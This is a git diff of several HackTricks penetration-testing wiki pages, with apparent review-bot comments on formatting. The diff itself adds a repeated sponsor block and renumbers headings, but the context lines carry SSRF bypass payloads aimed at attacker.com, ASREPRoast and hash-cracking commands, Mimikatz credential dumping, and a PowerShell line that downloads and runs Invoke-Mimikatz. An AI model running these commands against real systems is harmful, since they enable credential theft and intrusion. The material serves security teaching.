Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection. Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection.
# References ## References
* [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)**** * [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)
* ****[**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)**** * [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
* ****[**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)**** * [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
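Review bot: the Securityboat block added at the end of this hunk (`{% hint style="danger" %}`, the `<img ... data-size="original">` line and the `{% embed url="https://securityboat.in/contact-us" %}`) is pasted byte-for-byte into every page touched by this commit, so any later change to the wording, the logo path or the contact URL has to be repeated by hand in each file; keep one canonical copy of the snippet (a shared include if this GitBook space supports it, otherwise a note in the repo README listing every page that carries it) so the copies cannot drift. Separately, `style="danger"` is the style readers associate with a security warning; a sponsor box is better served by `style="info"`, applied consistently across all the files. Dropping the stray `****` around the reference links is a good cleanup.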
@ -263,5 +273,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# URL Format Bypass
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
## Localhost {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
### Localhost
```bash ```bash
# Localhost # Localhost
@ -85,7 +91,7 @@ spoofed.burpcollaborator.net = 127.0.0.1
![](<../../.gitbook/assets/image (649) (1) (1).png>) ![](<../../.gitbook/assets/image (649) (1) (1).png>)
## Domain Parser ### Domain Parser
```bash ```bash
https:attacker.com https:attacker.com
@ -115,7 +121,7 @@ attacker。com
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
``` ```
## Domain Confusion ### Domain Confusion
```bash ```bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost # Try also to change attacker.com for 127.0.0.1 to try to access localhost
@ -160,7 +166,7 @@ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
next={domain}&next=attacker.com next={domain}&next=attacker.com
``` ```
## Paths and Extensions Bypass ### Paths and Extensions Bypass
If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses: If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses:
@ -170,7 +176,7 @@ https://metadata/vulerable/path#.extension
https://metadata/expected/path/..%2f..%2f/vulnerable/path https://metadata/expected/path/..%2f..%2f/vulnerable/path
``` ```
## Bypass via redirect ### Bypass via redirect
It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\ It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\
For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\ For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\
@ -197,9 +203,9 @@ class Redirect(BaseHTTPRequestHandler):
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever() HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
``` ```
# Explained Tricks ## Explained Tricks
## Blackslash-trick ### Blackslash-trick
In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard. In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard.
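Review bot: the heading demoted in this hunk still carries the typo `### Blackslash-trick`, while the paragraph right below it (and the WHATWG/RFC3986 comparison it introduces) calls the technique the _backslash-trick_; since the line is already changed, spell it `### Backslash-trick` so the heading and its anchor match the term used in the text.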
@ -207,12 +213,18 @@ Both of them describe a way of parsing URI/URLs, with one slight difference. The
![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg) ![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
## Other Confusions ### Other Confusions
![](<../../.gitbook/assets/image (629).png>) ![](<../../.gitbook/assets/image (629).png>)
image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/) image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**. Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**.
## Finding exposed pods with OSINT ## Finding exposed pods with OSINT
@ -223,6 +230,13 @@ For example, a remote attacker can abuse this by accessing the following URL: `h
{% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %} {% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %}
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

View file

@ -1,7 +1,5 @@
# Reversing Tools & Basic Methods # Reversing Tools & Basic Methods
## Reversing Tools & Basic Methods
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -18,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Wasm decompiler / Wat compiler ## Wasm decompiler / Wat compiler
Online: Online:
@ -398,6 +403,13 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
* [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering) * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering)
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>

View file

@ -1,4 +1,4 @@
# ASREPRoast
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# ASREPRoast {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## ASREPRoast
The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_. The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_.
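Review bot: the `## ASREPRoast` heading added here repeats the page's line-1 title `# ASREPRoast` (the old mid-page `# ASREPRoast` is only demoted, not removed), whereas the Reversing Tools hunk in this same commit deletes its duplicated `## Reversing Tools & Basic Methods` subtitle. Pick one convention for the commit: either drop the `## ASREPRoast` line as well and let the first content heading be `### Enumerating vulnerable users`, or keep the duplicated subtitle in both pages.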
@ -25,13 +31,13 @@ That means that anyone can send an AS\_REQ request to the DC on behalf of any of
Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**. Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**.
### Enumerating vulnerable users (need domain credentials) #### Enumerating vulnerable users (need domain credentials)
```bash ```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
``` ```
### Request AS\_REP message #### Request AS\_REP message
{% code title="Using Linux" %} {% code title="Using Linux" %}
```bash ```bash
@ -49,14 +55,14 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github
``` ```
{% endcode %} {% endcode %}
## Cracking ### Cracking
``` ```
john --wordlist=passwords_kerb.txt hashes.asreproast john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
``` ```
## Persistence ### Persistence
Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties): Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties):
@ -66,6 +72,12 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) [**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -82,5 +94,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Kerberos Authentication
<details> <details>
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/) **This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
# Kerberos (I): How does Kerberos work? Theory ## Kerberos (I): How does Kerberos work? Theory
20 - MAR - 2019 - ELOY PÉREZ 20 - MAR - 2019 - ELOY PÉREZ
@ -31,13 +37,13 @@ In this first post only basic functionality will be discussed. In later posts it
If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic. If you have any doubt about the topic which it is not well explained, do not be afraid on leave a comment or question about it. Now, onto the topic.
## What is Kerberos? ### What is Kerberos?
Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access. Firstly, Kerberos is an authentication protocol, not authorization. In other words, it allows to identify each user, who provides a secret password, however, it does not validates to which resources or services can this user access.
Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources. Kerberos is used in Active Directory. In this platform, Kerberos provides information about the privileges of each user, but it is responsability of each service to determine if the user has access to its resources.
## Kerberos items ### Kerberos items
In this section several components of Kerberos environment will be studied. In this section several components of Kerberos environment will be studied.
@ -98,7 +104,7 @@ Below is shown a summary of message sequency to perform authentication
![Kerberos messages summary](<../../.gitbook/assets/image (174).png>) ![Kerberos messages summary](<../../.gitbook/assets/image (174).png>)
## Authentication process ### Authentication process
In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service. In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service.
@ -115,7 +121,7 @@ _KRB\_AS\_REQ_ has, among others, the following fields:
* The service **SPN** asociated with **krbtgt** account * The service **SPN** asociated with **krbtgt** account
* A **Nonce** generated by the user * A **Nonce** generated by the user
Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) __ flag is set in user account. Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) \_\_ flag is set in user account.
**KRB\_AS\_REP** **KRB\_AS\_REP**
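Review bot: on the DONT_REQ_PREAUTH note line, the `__` after the link is a leftover from the original extraction rather than content; escaping it to `\_\_` stops Markdown from reading it as emphasis but makes two literal underscores appear in the rendered sentence. Delete the token instead, so the line reads "... user-account-pro) flag is set in user account."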
@ -187,7 +193,7 @@ _KRB\_AP\_REQ_ includes:
After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB\_AP\_REP_ message. After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB\_AP\_REP_ message.
## References ### References
* Kerberos v5 RFC: [https://tools.ietf.org/html/rfc4120](https://tools.ietf.org/html/rfc4120) * Kerberos v5 RFC: [https://tools.ietf.org/html/rfc4120](https://tools.ietf.org/html/rfc4120)
* \[MS-KILE] Kerberos extension: [https://msdn.microsoft.com/en-us/library/cc233855.aspx](https://msdn.microsoft.com/en-us/library/cc233855.aspx) * \[MS-KILE] Kerberos extension: [https://msdn.microsoft.com/en-us/library/cc233855.aspx](https://msdn.microsoft.com/en-us/library/cc233855.aspx)
@ -195,7 +201,7 @@ After that, if user privileges are rigth, this can access to service. If is the
* Mimikatz and Active Directory Kerberos Attacks: [https://adsecurity.org/?p=556](https://adsecurity.org/?p=556) * Mimikatz and Active Directory Kerberos Attacks: [https://adsecurity.org/?p=556](https://adsecurity.org/?p=556)
* Explain like Im 5: Kerberos: [https://www.roguelynn.com/words/explain-like-im-5-kerberos/](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) * Explain like Im 5: Kerberos: [https://www.roguelynn.com/words/explain-like-im-5-kerberos/](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
* Kerberos & KRBTGT: [https://adsecurity.org/?p=483](https://adsecurity.org/?p=483) * Kerberos & KRBTGT: [https://adsecurity.org/?p=483](https://adsecurity.org/?p=483)
* Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex. * Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex.
* Active Directory , 5 Edition. Autores: B. Desmond, J. Richards, R. Allen y A.G. Lowe-Norris * Active Directory , 5 Edition. Autores: B. Desmond, J. Richards, R. Allen y A.G. Lowe-Norris
* Service Principal Names: [https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/ms677949\(v=vs.85\).aspx) * Service Principal Names: [https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/ms677949\(v=vs.85\).aspx)
* Niveles funcionales de Active Directory: [https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0](https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0) * Niveles funcionales de Active Directory: [https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0](https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0)
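Review bot: the reference entries in this hunk still carry untranslated Spanish from the Tarlogic source on an otherwise English page: "Autores", the "y" between author names, and the entry title "Niveles funcionales de Active Directory"; render them as "Authors", "and" and "Active Directory functional levels". In the same entries, the publisher of Mastering Windows Network Forensics and Investigation is Sybex, not "Sibex", and "2 Edition ." / "5 Edition." should read "2nd Edition." / "5th Edition.".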
@ -213,6 +219,12 @@ After that, if user privileges are rigth, this can access to service. If is the
* Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036) * Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: [https://www.microsoft.com/en-us/download/details.aspx?id=36036](https://www.microsoft.com/en-us/download/details.aspx?id=36036)
* Fun with LDAP, Kerberos (and MSRPC) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58) * Fun with LDAP, Kerberos (and MSRPC) in AD Environments: [https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# SmbExec/ScExec
<details> <details>
@ -16,12 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# How does it works {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
**Smbexec works like Psexec.** In this example**,** **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor. ## How does it works
# **SMBExec** **Smbexec works like Psexec.** In this example\*\*,\*\* **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor.
## **SMBExec**
Let's see what happens when smbexec runs by looking at it from the attackers and target's side: Let's see what happens when smbexec runs by looking at it from the attackers and target's side:
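Review bot: escaping the bold comma as `\*\*,\*\*` on the "Smbexec works like Psexec" line makes the literal characters `**,**` show up in the rendered sentence, which is worse than the stray bold it replaces; use a plain comma: "In this example, **instead** of pointing". The heading demoted in the same hunk should read "## How does it work" rather than "## How does it works", and "one of they will download and execute the backdoor" should be "one of them will download and execute the backdoor".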
@ -33,7 +39,7 @@ So we know it creates a service "BTOBTO". But that service isn't present on the
The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echoes the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"! The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echoes the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"!
# Manual SMBExec ## Manual SMBExec
**Or executing commands via services** **Or executing commands via services**
@ -55,10 +61,14 @@ And then start it:
It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed. It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed.
All the info was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) All the info was extracted from here: [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
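Review bot: the inserted callout (the five lines between `{% hint style="danger" %}` and `{% endhint %}`) is promotional text, yet `style="danger"` renders it as a red warning box that readers will take for a security notice about the SMBExec technique; `style="info"` is the appropriate style for it. The `<img src="../../.gitbook/assets/SB logo black_034525.png">` path also contains unencoded spaces, so confirm GitBook resolves it from raw HTML or rename the asset without spaces. The same five lines are pasted verbatim in four more places in this commit; a shared snippet would let copy or link changes happen once.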
@ -75,5 +85,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -1,4 +1,4 @@
# Stealing Credentials
<details> <details>
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
# Credentials Mimikatz {% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
## Credentials Mimikatz
```bash ```bash
#Elevate Privileges to extract the credentials #Elevate Privileges to extract the credentials
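Review bot: the demotion of `# Credentials Mimikatz` to `## Credentials Mimikatz` is right now that the page title is the only H1, but the callout is inserted directly between the top `</details>` block and that first H2, so the page opens on an advertisement before any content; placing it once, next to the existing swag/PR footer at the bottom, keeps the opening on topic.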
@ -33,7 +39,7 @@ mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump
**Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.** **Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.**
## Invoke-Mimikatz ### Invoke-Mimikatz
```bash ```bash
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1') IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
@ -43,7 +49,7 @@ Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpa
[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.** [**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.**
# Credentials with Meterpreter ## Credentials with Meterpreter
Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim. Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim.
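Review bot: the context line right above the demoted `## Credentials with Meterpreter` heading reads "**This protections could prevent Mimikatz from extracting some credentials.**"; since the file is being reworked, change it to "These protections can prevent Mimikatz from extracting some credentials."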
@ -63,11 +69,11 @@ mimikatz_command -f "sekurlsa::logonpasswords"
mimikatz_command -f "lsadump::sam" mimikatz_command -f "lsadump::sam"
``` ```
# Bypassing AV ## Bypassing AV
## Procdump + Mimikatz ### Procdump + Mimikatz
As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender. \ As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender.\
